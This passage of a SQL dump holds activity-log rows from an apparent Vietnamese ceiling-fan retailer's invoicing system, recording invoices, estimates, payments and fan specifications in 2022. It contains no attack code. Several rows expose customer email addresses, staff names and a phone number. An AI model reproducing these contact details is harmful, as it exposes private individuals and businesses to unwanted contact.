(901, 'invoice', 165, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-19 17:10:51'),
(902, 'invoice', 165, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.225.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/167\" target=\"_blank\">#167</a>\";}', '1', 'Ho Gia Phat', '2022-08-19 17:10:51'),
(903, 'invoice', 159, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-22 09:38:34'),
(904, 'invoice', 159, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-22 09:38:47'),
(905, 'invoice', 159, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.100.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/168\" target=\"_blank\">#168</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-22 09:38:47'),
(906, 'invoice', 159, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:49:\"Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-22 09:48:21'),
(907, 'invoice', 159, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-22 09:48:21'),
(908, 'invoice', 159, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-22 09:53:09'),
(909, 'invoice', 159, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"168\";i:1;s:12:\"7.100.000 đ\";}', '1', 'Ho Gia Phat', '2022-08-22 09:53:09'),
(910, 'invoice', 166, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-22 15:09:25'),
(911, 'invoice', 163, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-23 09:58:47'),
(912, 'invoice', 163, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-23 13:42:54'),
(913, 'invoice', 163, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/169\" target=\"_blank\">#169</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-23 13:42:54'),
(914, 'invoice', 166, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-23 13:43:15'),
(915, 'invoice', 166, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.475.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/170\" target=\"_blank\">#170</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-23 13:43:15'),
(916, 'estimate', 88, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-08-25 08:45:11'),
(917, 'estimate', 88, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:178:\"Sải cánh 132cm<br />\r\nMàu sắc cánh: Maple Wood<br />\r\nMàu sắc thân quạt: White<br />\r\nĐộng cơ DC, BLDC, công suất 35W<br />\r\nĐiều khiển DC 5 tốc độ \";i:1;s:153:\"Sải cánh 132cm\r\nMàu sắc cánh: Maple Wood\r\nMàu sắc thân quạt: White\r\nĐộng cơ DC, BLDC, công suất 35W\r\nĐiều khiển DC 5 tốc độ\";}', '1', 'Ho Gia Phat', '2022-08-25 08:45:54'),
(919, 'estimate', 88, 'estimate_activity_client_accepted_and_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/167\">INV-162-22</a>\";}', NULL, '', '2022-08-25 08:50:05'),
(920, 'estimate', 88, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6300000.00\";i:1;s:7:\"4180000\";}', '1', 'Ho Gia Phat', '2022-08-25 08:54:45'),
(921, 'estimate', 88, 'not_estimate_invoice_deleted', '', '1', 'Ho Gia Phat', '2022-08-25 08:55:27'),
(922, 'invoice', 168, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-08-25 08:56:10'),
(923, 'estimate', 88, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/168\">INV-162-22</a>\";}', '1', 'Ho Gia Phat', '2022-08-25 08:56:10'),
(924, 'invoice', 168, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-25 09:41:57'),
(925, 'invoice', 168, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"20.900.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/171\" target=\"_blank\">#171</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-25 09:41:57'),
(926, 'estimate', 89, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-08-25 11:01:51'),
(927, 'estimate', 89, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-08-25 11:02:23'),
(928, 'invoice', 169, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-08-25 11:14:03'),
(929, 'estimate', 89, 'estimate_activity_client_accepted_and_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/169\">INV-163-22</a>\";}', NULL, '', '2022-08-25 11:14:03'),
(930, 'invoice', 169, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:26:\"Haiku 60 inch Cocoa Bamboo\";i:1;s:34:\"Haiku 60 inch Cocoa/Caramel Bamboo\";}', '1', 'Ho Gia Phat', '2022-08-25 16:43:00'),
(931, 'invoice', 169, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"31300000.00\";i:1;s:8:\"30000000\";}', '1', 'Ho Gia Phat', '2022-08-25 16:43:00'),
(932, 'invoice', 169, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:34:\"Haiku I 60 inch White with SenseME\";}', '1', 'Ho Gia Phat', '2022-08-25 16:43:00'),
(933, 'invoice', 169, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"30000000.00\";i:1;s:11:\"29600000.00\";}', '1', 'Ho Gia Phat', '2022-08-25 16:43:35'),
(934, 'invoice', 169, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"30000000.00\";i:1;s:11:\"29600000.00\";}', '1', 'Ho Gia Phat', '2022-08-25 16:43:35'),
(935, 'invoice', 169, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-26 10:02:15'),
(936, 'invoice', 169, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"12.080.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/172\" target=\"_blank\">#172</a>\";}', '1', 'Ho Gia Phat', '2022-08-26 10:02:15'),
(937, 'invoice', 169, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-26 10:02:41'),
(938, 'invoice', 169, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"172\";i:1;s:13:\"12.080.000 đ\";}', '1', 'Ho Gia Phat', '2022-08-26 10:02:41'),
(939, 'invoice', 169, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-26 10:03:23'),
(940, 'invoice', 169, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"120.800.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/173\" target=\"_blank\">#173</a>\";}', '1', 'Ho Gia Phat', '2022-08-26 10:03:23'),
(941, 'estimate', 89, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-26 13:11:29'),
(942, 'estimate', 89, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-26 13:12:45'),
(943, 'estimate', 89, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"31300000.00\";i:1;s:8:\"29600000\";}', '1', 'Ho Gia Phat', '2022-08-26 13:12:45'),
(944, 'estimate', 89, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:34:\"Haiku I 60 inch White with SenseME\";}', '1', 'Ho Gia Phat', '2022-08-26 13:12:45'),
(945, 'estimate', 89, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-26 13:12:53'),
(946, 'invoice', 170, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-08-27 09:48:28'),
(947, 'invoice', 155, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-29 15:24:41'),
(948, 'invoice', 155, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.260.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/174\" target=\"_blank\">#174</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-29 15:24:41'),
(949, 'invoice', 159, 'invoice_activity_marked_as_cancelled', '', '6', 'Mỹ Anh Nguyễn', '2022-08-29 15:25:11'),
(950, 'invoice', 147, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-29 17:42:38'),
(951, 'invoice', 147, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"48.360.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/175\" target=\"_blank\">#175</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-29 17:42:38'),
(952, 'invoice', 171, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-30 09:44:10'),
(953, 'invoice', 171, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-30 10:45:25'),
(954, 'invoice', 171, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/176\" target=\"_blank\">#176</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-30 10:45:25'),
(955, 'estimate', 90, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-08-30 11:08:55'),
(956, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-08-30 11:36:18'),
(957, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-08-30 11:36:23'),
(958, 'invoice', 144, 'activity_due_reminder_is_sent', 'a:2:{i:0;s:49:\"<custom_data>hien.vo@alliancevn.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-08-30 11:36:29'),
(959, 'invoice', 145, 'activity_due_reminder_is_sent', 'a:2:{i:0;s:42:\"<custom_data>info@savimec.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-08-30 11:36:35'),
(960, 'invoice', 150, 'activity_due_reminder_is_sent', 'a:2:{i:0;s:42:\"<custom_data>nga.do@mepac.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-08-30 11:36:40'),
(961, 'estimate', 91, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-08-30 15:51:34'),
(962, 'estimate', 91, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:1599:\"MODEL: Haiku H Indoor in White Aluminum<br />\r\nDiameter: 60 inch (S3150)<br />\r\nĐường kính cánh: 1520mm<br />\r\nAirfoil Finishes Color: White Aluminum<br />\r\nMàu sác cánh: White Aluminum<br />\r\nHardware Finishe Color: White<br />\r\nMàu thân quạt: White<br />\r\nOnboard Sensors: Ambient and surface temperature, relative humidity, and passive infrared sensors enable SenseME technology<br />\r\nCảm biến tích hợp: Nhiệt độ môi trường và bề mặt, độ ẩm tương đối và cảm biến hồng ngoại thụ động sử dụng công nghệ SenseME<br />\r\nEnvironment: Indoor<br />\r\nMôi trường sử dụng: Trong Nhà<br />\r\nAccessories: Remote Control 7 speed<br />\r\nBộ điều khiển từ xa  7 tốc độ đi kèm gắn tường/cầm tay<br />\r\nMount: Universal<br />\r\nMóc treo sử dụng ống ty nối dài mở rộng thêm tuỳ chọn<br />\r\nWeight: 17.5 lb (8 kg)<br />\r\nTrọng lượng: 8kg<br />\r\nMax Speed: 200 RPM<br />\r\nTốc độ quay tối đa: 200RPM<br />\r\nAirflow Min/ Max: 1,099 / 8,534 cfm<br />\r\nHiệu suất luồng gió Min/Max: 1,194 / 8,629 CFM<br />\r\nWatts Min/ Max: 2.8 / 30.5 W<br />\r\nCông suất động cơ Min/Max: 2.8 /30.5W<br />\r\nOperating Voltage: 200-240 VAC, 1 Φ, 50–60 Hz<br />\r\nNguồn điện: 200-240 VAC, 1 Φ, 50–60 Hz<br />\r\nAmbient Operational Temperature: 0° to 40° C<br />\r\nNhiệt độ hoạt động: 0° đến 40° C<br />\r\nSound Level: &lt;35dBa<br />\r\nĐộ ồn quay ở tốc độ cao: &lt;35dBa<br />\r\nBrandneme/Original: Haiku of Big Ass Fans/USA<br />\r\nThương hiệu/xuất xứ: Haiku\";i:1;s:1399:\"\"MODEL: S3150-X2-AW-04-02-C-01-\r\nF259 - Haiku in White Aluminum\"\r\nDiameter: 60 inch (S3150-AW)\r\nĐường kính cánh: 1520mm\r\nAirfoil Finishes Color: White Aluminum\r\nMàu sác cánh: White Aluminum\r\nHardware Finishe Color: White\r\nMàu sác thân: Trắng\r\nMotor : High-efficiency, brushless DC/EC motor\r\nĐộng cơ: tiêu chuẩn tiết kiệm điện, DC/EC \r\n\"Onboard Sensors: Temperature, humidity, and\r\nmotion sensors enable\r\nSenseME Technology\"\r\nBộ cảm biến tích hợp, kiểm soát nhiệt độ, độ ẩm, cảm biến chuyển động thông qua công nghệ SenseME\r\nEnvironment: Indoor\r\nMôi trường sử dụng: Trong Nhà\r\nAccessories: Remote Control 7 speed\r\nBộ điều khiển từ xa  7 tốc độ đi kèm gắn tường/cầm tay\r\nMount: Universal\r\nMóc treo sử dụng ống ty nối dài mở rộng thêm tuỳ chọn\r\nWeight: 17.5 lb (8 kg)\r\nTrọng lượng: 8kg\r\nMax Speed: 200 RPM\r\nTốc độ quay tối đa: 200RPM\r\nAirflow Min/ Max: 1,194 / 8,629 cfm\r\nHiệu suất luồng gió Min/Max: 1,194 / 8,629 CFM\r\nOperating Voltage: 200-240 VAC, 1 Φ, 50–60 Hz\r\nNguồn điện: 200-240 VAC, 1 Φ, 50–60 Hz\r\nAmbient Operational Temperature: 0° to 40° C\r\nNhiệt độ hoạt động: 0° đến 40° C\r\nSound Level: &lt;35dBa\r\nĐộ ồn quay ở tốc độ cao: &lt;35dBa\r\nBrandneme/Original: Haiku of Big Ass Fans/USA\r\nThương hiệu/xuất xứ: Haiku\";}', '1', 'Ho Gia Phat', '2022-08-30 15:52:31'),
(963, 'estimate', 91, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:1597:\"\"MODEL: S3150-X2-AW-04-02-C-01-<br />\r\nF259 - Haiku in White Aluminum\"<br />\r\nDiameter: 60 inch (S3150-AW)<br />\r\nĐường kính cánh: 1520mm<br />\r\nAirfoil Finishes Color: White Aluminum<br />\r\nMàu sác cánh: White Aluminum<br />\r\nHardware Finishe Color: White<br />\r\nMàu sác thân: Trắng<br />\r\nMotor : High-efficiency, brushless DC/EC motor<br />\r\nĐộng cơ: tiêu chuẩn tiết kiệm điện, DC/EC <br />\r\n\"Onboard Sensors: Temperature, humidity, and<br />\r\nmotion sensors enable<br />\r\nSenseME Technology\"<br />\r\nBộ cảm biến tích hợp, kiểm soát nhiệt độ, độ ẩm, cảm biến chuyển động thông qua công nghệ SenseME<br />\r\nEnvironment: Indoor<br />\r\nMôi trường sử dụng: Trong Nhà<br />\r\nAccessories: Remote Control 7 speed<br />\r\nBộ điều khiển từ xa  7 tốc độ đi kèm gắn tường/cầm tay<br />\r\nMount: Universal<br />\r\nMóc treo sử dụng ống ty nối dài mở rộng thêm tuỳ chọn<br />\r\nWeight: 17.5 lb (8 kg)<br />\r\nTrọng lượng: 8kg<br />\r\nMax Speed: 200 RPM<br />\r\nTốc độ quay tối đa: 200RPM<br />\r\nAirflow Min/ Max: 1,194 / 8,629 cfm<br />\r\nHiệu suất luồng gió Min/Max: 1,194 / 8,629 CFM<br />\r\nOperating Voltage: 200-240 VAC, 1 Φ, 50–60 Hz<br />\r\nNguồn điện: 200-240 VAC, 1 Φ, 50–60 Hz<br />\r\nAmbient Operational Temperature: 0° to 40° C<br />\r\nNhiệt độ hoạt động: 0° đến 40° C<br />\r\nSound Level: &lt;35dBa<br />\r\nĐộ ồn quay ở tốc độ cao: &lt;35dBa<br />\r\nBrandneme/Original: Haiku of Big Ass Fans/USA<br />\r\nThương hiệu/xuất xứ: Haiku\";i:1;s:1413:\"MODEL: S3150-X2-AW-04-02-C-01-\r\nF259 - Haiku in White Aluminum\"\r\nDiameter: 60 inch (S3150-AW)\r\nĐường kính cánh: 1520mm\r\nAirfoil Finishes Color: White Aluminum\r\nMàu sác cánh: White Aluminum\r\nHardware Finishe Color: White\r\nMàu sác thân: Trắng\r\nMotor : High-efficiency, brushless DC/EC motor\r\nĐộng cơ: tiêu chuẩn tiết kiệm điện, DC/EC \r\n\"Onboard Sensors: Temperature, humidity, and\r\nmotion sensors enable\r\nSenseME Technology\"\r\nBộ cảm biến tích hợp, kiểm soát nhiệt độ, độ ẩm, cảm biến chuyển động thông qua công nghệ SenseME\r\nEnvironment: Indoor\r\nMôi trường sử dụng: Trong Nhà\r\nAccessories: Remote Control 7 speed\r\nBộ điều khiển từ xa  7 tốc độ đi kèm gắn tường/cầm tay\r\nMount: Universal\r\nMóc treo sử dụng ống ty nối dài mở rộng thêm tuỳ chọn\r\nWeight: 17.5 lb (8 kg)\r\nTrọng lượng: 8kg\r\nMax Speed: 200 RPM\r\nTốc độ quay tối đa: 200RPM\r\nAirflow Min/ Max: 1,194 / 8,629 cfm\r\nHiệu suất luồng gió Min/Max: 1,194 / 8,629 CFM\r\nOperating Voltage: 200-240 VAC, 1 Φ, 50–60 Hz\r\nNguồn điện: 200-240 VAC, 1 Φ, 50–60 Hz\r\nAmbient Operational Temperature: 0° to 40° C\r\nNhiệt độ hoạt động: 0° đến 40° C\r\nSound Level: &lt;35dBa\r\nĐộ ồn quay ở tốc độ cao: &lt;35dBa\r\nBrandneme/Original: Haiku of Big Ass Fans/USA\r\nThương hiệu/xuất xứ: Haiku/Product of USA\";}', '1', 'Ho Gia Phat', '2022-08-30 15:53:11'),
(964, 'invoice', 172, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-08-30 15:54:57'),
(965, 'estimate', 91, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/172\">INV-166-22</a>\";}', '1', 'Ho Gia Phat', '2022-08-30 15:54:57'),
(966, 'invoice', 172, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-30 16:16:45'),
(967, 'invoice', 172, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"39.500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/177\" target=\"_blank\">#177</a>\";}', '1', 'Ho Gia Phat', '2022-08-30 16:16:45'),
(968, 'estimate', 92, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-02 11:53:08'),
(969, 'estimate', 92, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:44:\"Nhân công gia cố móc treo quạt trần\";i:1;s:83:\"Nhân công gia cố móc treo quạt trần - \r\nLiên hệ lắp đặt 0913579511\";}', '1', 'Ho Gia Phat', '2022-09-02 12:08:12'),
(970, 'invoice', 173, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-02 12:08:41'),
(971, 'estimate', 92, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/173\">INV-167-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-02 12:08:41'),
(972, 'invoice', 173, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-03 11:43:18'),
(973, 'invoice', 173, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"15.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/178\" target=\"_blank\">#178</a>\";}', '1', 'Ho Gia Phat', '2022-09-03 11:43:18'),
(974, 'invoice', 174, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-04 09:53:53'),
(975, 'estimate', 90, 'estimate_activity_client_accepted_and_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/174\">INV-168-22</a>\";}', NULL, '', '2022-09-04 09:53:53'),
(976, 'invoice', 145, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"155.231.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/179\" target=\"_blank\">#179</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-09-05 10:51:25'),
(977, 'invoice', 145, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:15:\"info@savimec.vn\";}', '6', 'Mỹ Anh Nguyễn', '2022-09-05 10:51:31'),
(978, 'estimate', 93, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-05 14:02:35'),
(979, 'invoice', 175, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-05 14:02:48'),
(980, 'estimate', 93, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/175\">INV-169-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-05 14:02:48'),
(981, 'invoice', 175, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:982:\"Đường kính cánh: 8ft ft (2.4 m)\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum\r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed)\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz\r\nĐiều khiển / Control: Remote Control for Wall\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA\r\nTrọng lượng: 18 kg\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h)\r\n\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh)\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)\";}', '1', 'Ho Gia Phat', '2022-09-05 14:05:22'),
(982, 'invoice', 174, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-05 14:06:54'),
(983, 'invoice', 174, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"58.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/180\" target=\"_blank\">#180</a>\";}', '1', 'Ho Gia Phat', '2022-09-05 14:06:54'),
(984, 'estimate', 94, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-05 15:44:35'),
(985, 'invoice', 176, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-05 15:44:56'),
(986, 'estimate', 94, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/176\">INV-170-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-05 15:44:56'),
